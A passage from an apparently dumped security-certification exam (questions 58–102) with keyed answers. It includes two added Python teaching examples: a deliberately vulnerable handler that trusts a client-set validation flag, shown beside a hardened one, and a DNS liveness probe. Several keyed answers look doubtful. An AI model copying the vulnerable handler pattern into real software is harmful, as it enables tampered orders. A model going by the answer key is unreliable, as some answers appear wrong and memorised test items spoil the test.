Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 58
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:

user@hostname:~$ sudo nmap -O 192.168.1.54

Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:

TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778

Based on this information, which of the following operating systems is MOST likely running on the unknown node?

A. Linux
B. Windows
C. Solaris
D. OSX

Correct Answer: C
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 59
A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news?

A. Update company policies and procedures
B. Subscribe to security mailing lists
C. Implement security awareness training
D. Ensure that the organization vulnerability management plan is up-to-date

Correct Answer: B
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 60
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs an effective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make?

A. Social media is an effective solution because it is easily adaptable to new situations.
B. Social media is an ineffective solution because the policy may not align with the business.
C. Social media is an effective solution because it implements SSL encryption.
D. Social media is an ineffective solution because it is not primarily intended for business applications.

Correct Answer: B
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 61
News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections?

A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology.
B. Implement an application whitelist at all levels of the organization.
C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring.
D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

Correct Answer: B
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 62
A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for the company?

A. Increase the frequency of antivirus downloads and install updates to all workstations.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections.
C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Correct Answer: B
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 63
A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for the first year?

A. -45 percent
B. 5.5 percent
C. 45 percent
D. 82 percent

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 64
A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings?

A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects.
B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution.
C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness.
D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 65
A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, but corporate assets are still found to be vulnerable. The business recently funded a patch management product and SOE hardening initiative. A third party auditor reported findings against the business because some systems were missing patches. Which of the following statements BEST describes this situation?

A. The CFO is at fault because they are responsible for patching the systems and have already been given patch management and SOE hardening products.
B. The audit findings are invalid because remedial steps have already been applied to patch servers and the remediation takes time to complete.
C. The CISO has not selected the correct controls and the audit findings should be assigned to them instead of the CFO.
D. Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly.

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 66
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the following BEST describes the scenario presented and the document the ISO is reviewing?

A. The ISO is evaluating the business implications of a recent telephone system failure within the BIA.
B. The ISO is investigating the impact of a possible downtime of the messaging system within the RA.
C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 67
Which of the following activities is commonly deemed "OUT OF SCOPE" when undertaking a penetration test?

A. Test password complexity of all login fields and input validation of form fields
B. Reverse engineering any thick client software that has been provided for the test
C. Undertaking network-based denial of service attacks in production environment
D. Attempting to perform blind SQL injection and reflected cross-site scripting attacks
E. Running a vulnerability scanning tool to assess network and host weaknesses

Correct Answer: C
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 68
A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self service functionality. The application has been written by developers over the last six months and the project is currently in the test phase. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO).

A. Perform unit testing of the binary code
B. Perform code review over a sampling of the front end source code
C. Perform black box penetration testing over the solution
D. Perform grey box penetration testing over the solution
E. Perform static code review over the front end source code

Correct Answer: DE
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 69
A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool?

A. The tool could show that input validation was only enabled on the client side
B. The tool could enumerate backend SQL database table and column names
C. The tool could force HTTP methods such as DELETE that the server has denied
D. The tool could fuzz the application to determine where memory leaks occur

Correct Answer: A
Section: Research and Analysis
Explanation

Explanation/Reference:
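Why an intercepting proxy exposes client-side-only validation (QUESTION 69), as an added example that is not part of the exam dump. The browser's JavaScript never sees a request that is edited in the proxy, so a handler that trusts a "the form was validated" flag accepts whatever the tester typed. The two handlers, the form field names and the unit price are all hypothetical; the request bodies are constructed here.

```python
"""Client-side-only validation versus server-side validation.

Added example, not from the exam dump.  Field names (qty, validated) and the
unit price are invented; the request bodies are constructed to show what a
browser sends versus what an interceptor lets a tester send.
"""
from urllib.parse import parse_qs

MAX_QTY = 10
UNIT_PRICE = 25  # hypothetical price in whole currency units


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def order_trusting_client(body):
    """VULNERABLE: assumes the browser's JavaScript already checked the fields."""
    form = parse_form(body)
    if form.get("validated") != "1":
        return {"status": 400, "error": "form not validated"}
    qty = int(form.get("qty", "0"))  # whatever the client chose to send
    return {"status": 200, "qty": qty, "total": qty * UNIT_PRICE}


def order_validating_server(body):
    """HARDENED: the server enforces the rules and ignores client-set flags."""
    form = parse_form(body)
    qty_raw = form.get("qty", "")
    if not qty_raw.isdigit():  # rejects "-5", "", "1e3", "5 OR 1=1"
        return {"status": 400, "error": "qty must be a positive integer"}
    qty = int(qty_raw)
    if not 1 <= qty <= MAX_QTY:
        return {"status": 400, "error": f"qty must be between 1 and {MAX_QTY}"}
    return {"status": 200, "qty": qty, "total": qty * UNIT_PRICE}


# What the browser sends after its own checks pass.
NORMAL_REQUEST = "qty=3&validated=1"
# What an interceptor lets a tester send: no JavaScript ran on this.
TAMPERED_REQUEST = "qty=-5&validated=1"

if __name__ == "__main__":
    print(order_trusting_client(TAMPERED_REQUEST))    # negative total accepted
    print(order_validating_server(TAMPERED_REQUEST))  # status 400
```

The finding the interceptor produces is exactly the difference between the two handlers: the same tampered body yields a negative order total from the first and a 400 from the second.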

QUESTION 70
A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Where would the consultant find this information and why would it be valuable?

A. This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection.
B. This information can be found by calling the regional Internet registry, and is valuable because backup connections typically do not require VPN access to the network.
C. This information can be found by accessing telecom billing records, and is valuable because backup connections typically have much lower latency than primary connections.
D. This information can be found by querying the network's DNS servers, and is valuable because backup DNS servers typically allow recursive queries from Internet hosts.

Correct Answer: A
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 71
A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physical security, which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO).

A. RAS
B. Vulnerability scanner
C. HTTP intercept
D. HIDS
E. Port scanner
F. Protocol analyzer

Correct Answer: DF
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 72
The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53?

A. PING
B. NESSUS
C. NSLOOKUP
D. NMAP

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 73
A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This division will require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task?

A. Interview candidates, attend training, and hire a staffing company that specializes in technology jobs
B. Interview employees and managers to discover the industry hot topics and trends
C. Attend meetings with staff, internal training, and become certified in software management
D. Attend conferences, webinars, and training to remain current with the industry and job requirements

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 74
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates.
B. Implementation of an offsite data center hosting all company data, as well as deployment of VDI for all client computing needs.
C. Host based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs.
D. Behavior based IPS with a communication link to a cloud based vulnerability and threat feed.

Correct Answer: D
Section: Research and Analysis
Explanation

Explanation/Reference:
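The three levels of check behind QUESTION 72, as an added example that is not part of the exam dump: ping proves Layer 3 reachability only; a TCP connect to the port is the port-level fact a scanner such as nmap reports; a real query over UDP proves the resolver is answering. The code builds and parses minimal DNS packets with the standard library only. The two stub listeners are constructed so the probes run offline against loopback; the host, port and query name are parameters whose defaults are assumptions.

```python
"""Is a DNS server really listening on port 53?

Added example, not from the exam dump.  Port-level probe (TCP connect) and
service-level probe (a real A query over UDP), plus constructed loopback stubs
so both can be exercised without a network.
"""
import socket
import struct
import threading

QUERY_ID = 0x1234   # fixed for the demo; use a random id in production
_OPEN_SOCKETS = []  # keeps stub listeners alive for the process lifetime


def build_query(name, qid=QUERY_ID):
    """Minimal DNS query: header with RD set, one A/IN question, no EDNS."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    labels = [lbl.encode() for lbl in name.strip(".").split(".")]
    qname = b"".join(bytes([len(lbl)]) + lbl for lbl in labels) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_header(data):
    """Header fields a liveness probe needs; raises on a truncated packet."""
    if len(data) < 12:
        raise ValueError("truncated DNS header")
    qid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    return {"id": qid, "is_response": bool(flags & 0x8000),
            "rcode": flags & 0x000F, "questions": qd, "answers": an}


def tcp_port_open(host, port, timeout=2.0):
    """Port-level check: does anything accept a TCP connection on host:port?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def dns_probe(host, port=53, name="example.com", timeout=2.0):
    """Service-level check over UDP: is the reply a response to our query?"""
    query = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (host, port))
        try:
            data, _ = s.recvfrom(512)
        except socket.timeout:
            return {"listening": False, "reason": "no reply"}
    try:
        hdr = parse_header(data)
    except ValueError as exc:
        return {"listening": False, "reason": str(exc)}
    if hdr["id"] != QUERY_ID or not hdr["is_response"]:
        return {"listening": False, "reason": "reply does not match query"}
    return {"listening": True, "rcode": hdr["rcode"], "answers": hdr["answers"]}


def start_stub_dns():
    """Constructed UDP responder: echoes the question with QR set and one
    A record (10.0.0.1).  Returns the ephemeral port it bound on loopback."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("127.0.0.1", 0))

    def serve():
        while True:
            data, peer = sock.recvfrom(512)
            answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes([10, 0, 0, 1])
            reply = data[:2] + b"\x81\x80" + struct.pack("!HHHH", 1, 1, 0, 0) + data[12:] + answer
            sock.sendto(reply, peer)

    threading.Thread(target=serve, daemon=True).start()
    _OPEN_SOCKETS.append(sock)
    return sock.getsockname()[1]


def start_stub_tcp():
    """Constructed TCP listener that accepts but never speaks (an open port)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("127.0.0.1", 0))
    sock.listen(5)
    _OPEN_SOCKETS.append(sock)
    return sock.getsockname()[1]


if __name__ == "__main__":
    port = start_stub_dns()
    print(dns_probe("127.0.0.1", port))      # {'listening': True, 'rcode': 0, 'answers': 1}
    print(tcp_port_open("127.0.0.1", port))  # False: the stub listens on UDP only
```

The last line is the point of the question: a DNS service that answers on UDP 53 can still show TCP 53 closed, and a host that answers ping can have nothing listening at all, so the probe has to be made at the layer the ticket is about.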

QUESTION 75
A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?

A. Survey threat feeds from services inside the same industry.
B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic.
C. Conduct an internal audit against industry best practices to perform a qualitative analysis.
D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor.

Correct Answer: A
Section: Research and Analysis
Explanation

Explanation/Reference:

QUESTION 76
A security engineer is working on a large software development project. As part of the design of the project, various stakeholder requirements were gathered and decomposed to an implementable and testable level. Various security requirements were also documented. Organize the following security requirements into the correct hierarchy required for an SRTM.

Requirement 1: The system shall provide confidentiality for data in transit and data at rest.
Requirement 2: The system shall use SSL, SSH, or SCP for all data transport.
Requirement 3: The system shall implement a file-level encryption scheme.
Requirement 4: The system shall provide integrity for all data at rest.
Requirement 5: The system shall perform CRC checks on all files.

A. Level 1: Requirements 1 and 4; Level 2: Requirements 2, 3, and 5
B. Level 1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
C. Level 1: Requirements 1, 2, and 3; Level 2: Requirements 4 and 5
D. Level 1: Requirements 1 and 4; Level 2: Requirement 2 under 1, Requirement 5 under 4; Level 3: Requirement 3 under 2

Correct Answer: B
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 77
During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution?

A. Implement an IPS to block the application on the network
B. Implement the remote application out to the rest of the servers
C. Implement SSL VPN with SAML standards for federation
D. Implement an ACL on the firewall with NAT for remote access

Correct Answer: C
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 78
A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retail stores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which provides voice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access to the POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. After malware removal, the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk?

A. Deploy new perimeter firewalls at all stores with UTM functionality.
B. Change antivirus vendors at the store and the corporate office.
C. Move to a VDI solution that runs offsite from the same data center that hosts the new POS solution.
D. Deploy a proxy server with content filtering at the corporate office and route all traffic through it.

Correct Answer: A
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 79
Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary information and closely guarded corporate trade secrets. The information security team has been a part of the department meetings and come away with the following notes:

-Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application.
-Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy.
-Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the entire workflow process for monitoring and baselining.
-Sales is asking for easy order tracking to facilitate feedback to customers.
-Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction.

The favored solution is a user friendly software application that would be hosted onsite, a cloud-based SaaS application. It has extensive ACL functionality, but also has readily available APIs for extensibility. It supports read-only access, custom fields, and data encryption.

Which of the following departments' request is in contrast to the favored solution?

A. Manufacturing
B. Legal
C. Sales
D. Quality assurance
E. Human resources

Correct Answer: E
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 80
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO).

A. Web cameras
B. Email
C. Instant messaging
D. BYOD
E. Desktop sharing
F. Presence

Correct Answer: CE
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 81
An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE).

A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations

F. Marketing
G. Information technology

Correct Answer: AEG
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 82
A completely new class of web-based vulnerabilities has been discovered. Claims have been made that all common web-based development frameworks are susceptible to attack. Proof-of-concept details have emerged on the Internet. A security advisor within a company has been asked to provide recommendations on how to respond quickly to these vulnerabilities. Which of the following BEST describes how the security advisor should respond?

A. Assess the reliability of the information source, likelihood of exploitability, and impact to hosted data. Attempt to exploit via the proof-of-concept code. Consider remediation options.
B. Hire an independent security consulting agency to perform a penetration test of the web servers. Advise management of any 'high' or 'critical' penetration test findings and put forward recommendations for mitigation.
C. Review vulnerability write-ups posted on the Internet. Respond to management with a recommendation to wait until the news has been independently verified by software vendors providing the web application software.
D. Notify all customers about the threat to their hosted data. Bring the web servers down into "maintenance mode" until the vulnerability can be reliably mitigated through a vendor patch.

Correct Answer: A
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 83
A company sales manager received a memo from the company's financial department which stated that the company would not be putting its software products through the same security testing as previous years to reduce the research and development cost by 20 percent for the upcoming year. The memo also stated that the marketing material and service level agreement for each product would remain unchanged. The sales manager has reviewed the sales goals for the upcoming year and identified an increased target across the software products that will be affected by the financial department's change. All software products will continue to go through new development in the coming year. Which of the following should the sales manager do to ensure the company stays out of trouble?

A. Discuss the issue with the software product's user groups
B. Consult the company's legal department on practices and law
C. Contact senior finance management and provide background information
D. Seek industry outreach for software practices and law

Correct Answer: B
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 84
A member of the software development team has requested advice from the security team to implement a new secure lab for testing malware. Which of the following is the NEXT step that the security team should take?

A. Purchase new hardware to keep the malware isolated.
B. Develop a policy to outline what will be required in the secure lab.
C. Construct a series of VMs to host the malware environment.
D. Create a proposal and present it to management for approval.

Correct Answer: D
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 85
A company has issued a new mobile device policy permitting BYOD and company-issued devices. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. The policy states that, "BYOD clients must meet the company's infrastructure requirements to permit a connection." The company also issues a memorandum separate from the policy, which provides instructions for the purchase, installation, and use of the middleware client on BYOD. Which of the following is being described?

A. Asset management
B. IT governance
C. Change management
D. Transference of risk

Correct Answer: B
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 86
A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. A total outage period of four hours is permitted for servers. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify parameters for the maintenance work? (Select TWO).

A. Managed security service
B. Memorandum of understanding
C. Quality of service

D. Network service provider
E. Operating level agreement

Correct Answer: BE
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 87
An organization has decided to reduce labor costs by outsourcing back office processing of credit applications to a provider located in another country. Data sovereignty and privacy concerns raised by the security team resulted in the third-party provider only accessing and processing the data via remote desktop sessions. To facilitate communications and improve productivity, staff at the third party has been provided with corporate email accounts that are only accessible via the remote desktop sessions. Email forwarding is blocked and staff at the third party can only communicate with staff within the organization. Which of the following additional controls should be implemented to prevent data loss? (Select THREE).

A. Implement hashing of data in transit
B. Session recording and capture
C. Disable cross session cut and paste
D. Monitor approved credit accounts
E. User access audit reviews
F. Source IP whitelisting

Correct Answer: CEF
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 88
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has been in place for nine years, contains over a million lines of code, and took over two years to develop originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the following software development methods is MOST applicable?

A. Spiral model
B. Incremental model
C. Waterfall model
D. Agile model

Correct Answer: C
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 89
An attacker attempts to create a DoS event against the VoIP system of a company. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following would be LEAST likely to thwart such an attack?

A. Install IDS/IPS systems on the network
B. Force all SIP communication to be encrypted
C. Create separate VLANs for voice and data traffic
D. Implement QoS parameters on the switches

Correct Answer: D
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 90
The helpdesk department desires to roll out a remote support application for internal use on all company computers. This tool should allow remote desktop sharing, system log gathering, chat, hardware logging, inventory management, and remote registry access. The risk management team has been asked to review vendor responses to the RFQ. Which of the following questions is the MOST important?

A. What are the protections against MITM?
B. What accountability is built into the remote support application?
C. What encryption standards are used in tracking database?
D. What snapshot or "undo" features are present in the application?
E. What encryption standards are used in remote desktop and file transfer functionality?

Correct Answer: B
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 91
A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?

A. Agile
B. Waterfall
C. Scrum
D. Spiral

Correct Answer: B
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 92
A security manager has received the following email from the Chief Financial Officer (CFO):

"While I am concerned about the security of the proprietary financial data in our ERP application, we have had a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance targets. As things currently stand, we do not allow employees to work from home but this is something I am willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?"

Based on the information provided, which of the following would be the MOST appropriate response to the CFO?

A. Remote access to the ERP tool introduces additional security vulnerabilities and should not be allowed.
B. Allow VNC access to corporate desktops from personal computers for the users working from home.
C. Allow terminal services access from personal computers after the CFO provides a list of the users working from home.
D. Work with the executive management team to revise policies before allowing any remote access.

Correct Answer: D
Section: Integration of Computing, Communications and Business Disciplines
Explanation

Explanation/Reference:

QUESTION 93
Three companies want to allow their employees to seamlessly connect to each other's wireless corporate networks while keeping one consistent wireless client configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three companies implement?

A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.
B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.
C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.
D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Correct Answer: A
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 94
Company XYZ provides cable television service to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providing

telephone and Internet services. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries separate from the parent company. However all three companies must share customer data for the purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while only sharing minimal data between the companies. Which of the following solutions is BEST suited for this scenario?

A. The companies should federate, with the parent becoming the SP, and the subsidiaries becoming an IdP.
B. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SSP.
C. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SP.
D. The companies should federate, with the parent becoming the ASP, and the subsidiaries becoming an IdP.

Correct Answer: C
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 95
Company A needs to export sensitive data from its financial system to company B's database, using company B's API in an automated manner. Company A's policy prohibits the use of any intermediary external systems to transfer or store its sensitive data, therefore the transfer must occur directly between company A's financial system and company B's destination server using the supplied API. Additionally, company A's legacy financial software does not support encryption, while company B's API supports encryption. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements?

A. Company A must install an SSL tunneling software on the financial system.
B. Company A's security administrator should use an HTTPS capable browser to transfer the data.
C. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company B.
D. Company A and B must create a site-to-site IPSec VPN on their respective firewalls.

Correct Answer: A
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 96
A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:
Customers to upload their log files to the "big data" platform
Customers to perform remote log search
Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery

Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

A. Secure storage and transmission of API keys
B. Secure protocols for transmission of log files and search results
C. At least two years retention of log files in case of e-discovery requests
D. Multi-tenancy with RBAC support

E. Sanitiz­ing filters to prevent upload of sensitive log file contents
F. Encryption of logical volumes on which the customers' log files reside

Correct Answer: ABD
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 97
A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been implemented by the developers?

A. SSL certificate revocation
B. SSL certificate pinning
C. Mobile device root-kit detection
D. Extended Validation certificates

Correct Answer: B
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 98
A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. The administrator deploys DNSSEC extensions to the domain names and infrastructure. Which of the following security goals does this meet? (Select TWO).

A. Availability
B. Authentication
C. Integrity
D. Confidentiality
E. Encryption

Correct Answer: BC
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 99
The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system is out of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and known

about it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system?

A. Virtualize the system and migrate it to a cloud provider.
B. Segment the device on its own secure network.
C. Install an antivirus and HIDS on the system.
D. Hire developers to reduce vulnerabilities in the code.

Correct Answer: B
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 100
An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service. Which of the following should the company ensure is supported by the third-party? (Select TWO).

A. LDAP/S
B. SAML
C. NTLM
D. OAUTH
E. Kerberos

Correct Answer: BE
Section: Technical Integration of Enterprise Components
Explanation

Explanation/Reference:

QUESTION 101
An extensible commercial software system was upgraded to the next minor release version to patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was detected. The software vendor is called in to troubleshoot the issue and reports that all core components were updated properly. Which of the following has been overlooked in securing the system? (Select TWO).

A. The company's IDS signatures were not updated.
B. The company's custom code was not patched.
C. The patch caused the system to revert to http.
D. The software patch was not cryptographically signed.
E. The wrong version of the patch was used.
F. Third-party plug-ins were not patched.

Correct Answer: BF
Section: Technical Integration of Enterprise Components

Explanation

Explanation/Reference:

QUESTION 102
A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not have the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?

A. Offload some data processing to a public cloud
